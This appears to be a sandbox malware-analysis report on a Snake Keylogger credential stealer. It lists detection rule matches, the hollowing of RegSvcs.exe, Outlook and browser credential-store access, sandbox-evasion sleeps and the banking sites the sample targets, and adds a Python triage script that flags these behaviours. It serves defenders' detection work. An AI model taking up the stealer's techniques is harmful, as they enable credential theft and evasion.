                  Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.19d6P55zd1.exe.1e90000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.19d6P55zd1.exe.1e90000.1.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.19d6P55zd1.exe.1e90000.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.19d6P55zd1.exe.1e90000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.19d6P55zd1.exe.1e90000.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.19d6P55zd1.exe.1e90000.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 00000002.00000002.4601945370.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000000.00000002.2166172268.0000000001E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000000.00000002.2166172268.0000000001E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 00000000.00000002.2166172268.0000000001E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: Process Memory Space: 19d6P55zd1.exe PID: 4340, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: RegSvcs.exe PID: 1340, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@3/2@3/3
                  Source: C:\Users\user\Desktop\19d6P55zd1.exe Code function: 0_2_0038A06A GetLastError,FormatMessageW
                  Source: C:\Users\user\Desktop\19d6P55zd1.exe Code function: 0_2_003781CB AdjustTokenPrivileges,CloseHandle
                  Source: C:\Users\user\Desktop\19d6P55zd1.exe Code function: 0_2_003787E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
                  Source: C:\Users\user\Desktop\19d6P55zd1.exe Code function: 0_2_0038B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
                  Source: C:\Users\user\Desktop\19d6P55zd1.exe Code function: 0_2_0039EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
                  Source: C:\Users\user\Desktop\19d6P55zd1.exe Code function: 0_2_003983BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear
                  Source: C:\Users\user\Desktop\19d6P55zd1.exe Code function: 0_2_00324E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Mutant created: NULL
                  Source: C:\Users\user\Desktop\19d6P55zd1.exe File created: C:\Users\user\AppData\Local\Temp\autCBDF.tmp
                  Source: 19d6P55zd1.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\19d6P55zd1.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: RegSvcs.exe, 00000002.00000002.4603067666.000000000332B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4603067666.000000000333B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4603067666.000000000337B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4603067666.000000000336F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4603067666.0000000003349000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: 19d6P55zd1.exe Virustotal: Detection: 69%
                  Source: 19d6P55zd1.exe ReversingLabs: Detection: 76%
                  Source: unknown Process created: C:\Users\user\Desktop\19d6P55zd1.exe "C:\Users\user\Desktop\19d6P55zd1.exe"
                  Source: C:\Users\user\Desktop\19d6P55zd1.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\19d6P55zd1.exe"
                  Source: C:\Users\user\Desktop\19d6P55zd1.exe Section loaded: wsock32.dll
                  Source: C:\Users\user\Desktop\19d6P55zd1.exe Section loaded: version.dll
                  Source: C:\Users\user\Desktop\19d6P55zd1.exe Section loaded: winmm.dll
                  Source: C:\Users\user\Desktop\19d6P55zd1.exe Section loaded: mpr.dll
                  Source: C:\Users\user\Desktop\19d6P55zd1.exe Section loaded: wininet.dll
                  Source: C:\Users\user\Desktop\19d6P55zd1.exe Section loaded: iphlpapi.dll
                  Source: C:\Users\user\Desktop\19d6P55zd1.exe Section loaded: userenv.dll
                  Source: C:\Users\user\Desktop\19d6P55zd1.exe Section loaded: uxtheme.dll
                  Source: C:\Users\user\Desktop\19d6P55zd1.exe Section loaded: kernel.appcore.dll
                  Source: C:\Users\user\Desktop\19d6P55zd1.exe Section loaded: windows.storage.dll
                  Source: C:\Users\user\Desktop\19d6P55zd1.exe Section loaded: wldp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
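The signature lines above carry the three behaviours that make this sample worth a closer look: an AutoIt-compiled dropper starting RegSvcs.exe with a command line that names the dropper itself (the usual sign of a hollowed .NET host), RegSvcs.exe then reading the Outlook profile key, and a Chromium "Login Data" schema string in its memory. The Python below is an added triage helper, not part of the Joe Sandbox report or its engine: it parses signature lines in the shape shown on this page and turns them into findings. The sample lines are constructed copies of entries from this report (one left in the raw extracted form); the injection-host list, the five-minute sleep threshold and the category names are this example's own assumptions. The 922337203685477 ms delay that appears further down in the evasion section equals TimeSpan.MaxValue expressed in milliseconds, which the helper treats as an infinite sleep.

```python
"""Triage helper for flattened Joe Sandbox signature lines (added example, not report code)."""
import re
from dataclasses import dataclass
from typing import Iterable

# Constructed sample: copies of entries from the report above. The last one is kept in
# the raw extracted form (event keyword glued to the path, trailing link text).
SAMPLE_LINES = [
    r'Source: unknown Process created: C:\Users\user\Desktop\19d6P55zd1.exe "C:\Users\user\Desktop\19d6P55zd1.exe"',
    r'Source: C:\Users\user\Desktop\19d6P55zd1.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\19d6P55zd1.exe"',
    r'Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676',
    r'Source: RegSvcs.exe, 00000002.00000002.4603067666.000000000332B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));',
    r'Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477',
    r'Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 600000',
    r'Source: C:\Users\user\Desktop\19d6P55zd1.exeSection loaded: wsock32.dllJump to behavior',
]

# "Source: <source> <Event>: <detail>". The \s* before the event keyword also accepts the
# extraction artifact where the keyword is glued to the path ("...RegSvcs.exeProcess created").
LINE_RE = re.compile(
    r"^Source:\s*(?P<source>.+?)\s*"
    r"(?P<event>Process created|Key opened|Binary or memory string|Thread delayed"
    r"|Section loaded|File created|Mutant created)"
    r":\s*(?P<detail>.*?)\s*(?:Jump to behavior)?$"
)

# .NET framework binaries commonly used as hollowing/injection hosts (assumed list).
INJECTION_HOSTS = {"regsvcs.exe", "regasm.exe", "msbuild.exe", "installutil.exe", "applaunch.exe"}
DOTNET_MAX_DELAY_MS = 922337203685477   # TimeSpan.MaxValue.Ticks / 10000: a "forever" sleep
LONG_DELAY_MS = 5 * 60 * 1000            # assumed threshold for sandbox-timeout evasion


@dataclass(frozen=True)
class Finding:
    category: str
    evidence: str


def basename(path: str) -> str:
    return path.replace("/", "\\").rstrip("\\").rsplit("\\", 1)[-1].lower()


def first_token(cmdline: str) -> str:
    """Return argv[0] of a Windows command line, honouring a quoted first token."""
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[1:end] if end > 0 else s[1:]
    return s.split(" ", 1)[0]


def check_process_created(source: str, detail: str) -> list[Finding]:
    # detail is "<child image> <command line>"; the image paths in this report contain no spaces.
    image, _, cmdline = detail.partition(" ")
    child = basename(image)
    findings = []
    if cmdline and basename(first_token(cmdline)) != child:
        findings.append(Finding("image/command-line mismatch", f"{child} started with command line {cmdline}"))
    if child in INJECTION_HOSTS and basename(source) not in INJECTION_HOSTS:
        findings.append(Finding("dotnet injection host spawned", f"{basename(source)} -> {child}"))
    return findings


def check_key_opened(detail: str) -> list[Finding]:
    key = detail.lower()
    if "\\software\\microsoft\\office\\" in key and "\\outlook\\profiles\\" in key:
        return [Finding("mail credential store access", detail)]
    return []


def check_memory_string(detail: str) -> list[Finding]:
    s = detail.lower()
    # Chromium's Login Data database: the password_notes table references logins.
    if "create table" in s and ("password_notes" in s or "logins" in s):
        return [Finding("browser credential database schema", detail[:60])]
    return []


def check_thread_delay(detail: str) -> list[Finding]:
    m = re.search(r"delay time:\s*(\d+)", detail)
    if not m:
        return []
    ms = int(m.group(1))
    if ms >= DOTNET_MAX_DELAY_MS:
        return [Finding("effectively infinite sleep", f"{ms} ms (TimeSpan.MaxValue)")]
    if ms >= LONG_DELAY_MS:
        return [Finding("long sleep (sandbox timeout evasion)", f"{ms} ms")]
    return []


def triage(lines: Iterable[str]) -> list[Finding]:
    findings: list[Finding] = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        source, event, detail = m.group("source", "event", "detail")
        if event == "Process created":
            findings.extend(check_process_created(source, detail))
        elif event == "Key opened":
            findings.extend(check_key_opened(detail))
        elif event == "Binary or memory string":
            findings.extend(check_memory_string(detail))
        elif event == "Thread delayed":
            findings.extend(check_thread_delay(detail))
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_LINES):
        print(f"[{f.category}] {f.evidence}")
```

The mismatch check is the one worth carrying into endpoint telemetry: a process whose image is a .NET framework utility but whose command line names an executable in a user-writable directory is the pattern this report shows for the Snake Keylogger payload, independent of any hash.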
                  Source: 19d6P55zd1.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: 19d6P55zd1.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: 19d6P55zd1.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: 19d6P55zd1.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: 19d6P55zd1.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: 19d6P55zd1.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: 19d6P55zd1.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: wntdll.pdbUGP source: 19d6P55zd1.exe, 00000000.00000003.2163750749.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, 19d6P55zd1.exe, 00000000.00000003.2162644338.00000000038F0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: 19d6P55zd1.exe, 00000000.00000003.2163750749.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, 19d6P55zd1.exe, 00000000.00000003.2162644338.00000000038F0000.00000004.00001000.00020000.00000000.sdmp
                  Source: 19d6P55zd1.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: 19d6P55zd1.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: 19d6P55zd1.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: 19d6P55zd1.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: 19d6P55zd1.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                  Source: C:\Users\user\Desktop\19d6P55zd1.exe Code function: 0_2_00324B37 LoadLibraryA,GetProcAddress
                  Source: C:\Users\user\Desktop\19d6P55zd1.exe Code function: 0_2_0032C508 push A30032BAh; retn 0032h (at 0_2_0032C50D)
                  Source: C:\Users\user\Desktop\19d6P55zd1.exe Code function: 0_2_00348945 push ecx; ret (at 0_2_00348958)
                  Source: C:\Users\user\Desktop\19d6P55zd1.exe Code function: 0_2_003248D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
                  Source: C:\Users\user\Desktop\19d6P55zd1.exe Code function: 0_2_003A5376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed
                  Source: C:\Users\user\Desktop\19d6P55zd1.exe Code function: 0_2_00343187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress (x36)
                  Source: C:\Users\user\Desktop\19d6P55zd1.exe Process information set: NOOPENFILEERRORBOX (2 occurrences)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX (59 occurrences)

                  Malware Analysis System Evasion

                  Source: C:\Users\user\Desktop\19d6P55zd1.exe API/Special instruction interceptor: Address: 123A7F4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 600000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599890
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599781
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599671
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599562
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599453
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599343
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599234
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599124
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599014
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598906
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598796
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598687
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598578
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598468
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598359
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598250
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598140
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598031
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597921
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597812
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597702
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597593
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597484
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597374
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597265
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597156
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597046
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596928
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596796
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596687Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596578Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596468Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596359Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596250Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596140Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596030Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595909Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595781Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595671Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595562Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595452Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595343Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595234Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595125Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595011Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594896Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594765Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594655Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594546Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 8189Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 1650Jump to behavior
                  Source: C:\Users\user\Desktop\19d6P55zd1.exe | API coverage: 4.6 %
                  Source: C:\Users\user\Desktop\19d6P55zd1.exe | Code function: 0_2_0038445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0038445A
                  Source: C:\Users\user\Desktop\19d6P55zd1.exe | Code function: 0_2_0038C6D1 FindFirstFileW,FindClose,0_2_0038C6D1
                  Source: C:\Users\user\Desktop\19d6P55zd1.exe | Code function: 0_2_0038C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0038C75C
                  Source: C:\Users\user\Desktop\19d6P55zd1.exe | Code function: 0_2_0038EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0038EF95
                  Source: C:\Users\user\Desktop\19d6P55zd1.exe | Code function: 0_2_0038F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0038F0F2
                  Source: C:\Users\user\Desktop\19d6P55zd1.exe | Code function: 0_2_0038F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0038F3F3
                  Source: C:\Users\user\Desktop\19d6P55zd1.exe | Code function: 0_2_003837EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_003837EF
                  Source: C:\Users\user\Desktop\19d6P55zd1.exe | Code function: 0_2_00383B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00383B12
                  Source: C:\Users\user\Desktop\19d6P55zd1.exe | Code function: 0_2_0038BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0038BCBC
                  Source: C:\Users\user\Desktop\19d6P55zd1.exe | Code function: 0_2_003249A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_003249A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 922337203685477
                  Source: RegSvcs.exe, 00000002.00000002.4604479109.000000000437F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                  Source: RegSvcs.exe, 00000002.00000002.4604479109.000000000437F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                  Source: RegSvcs.exe, 00000002.00000002.4604479109.000000000437F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
                  Source: RegSvcs.exe, 00000002.00000002.4604479109.000000000437F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696487552f
                  Source: RegSvcs.exe, 00000002.00000002.4604479109.000000000437F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696487552x
                  Source: RegSvcs.exe, 00000002.00000002.4604479109.000000000437F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
                  Source: RegSvcs.exe, 00000002.00000002.4604479109.000000000437F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696487552
                  Source: RegSvcs.exe, 00000002.00000002.4604479109.000000000437F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                  Source: RegSvcs.exe, 00000002.00000002.4604479109.000000000437F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                  Source: RegSvcs.exe, 00000002.00000002.4604479109.000000000437F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696487552
                  Source: RegSvcs.exe, 00000002.00000002.4604479109.000000000437F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696487552o
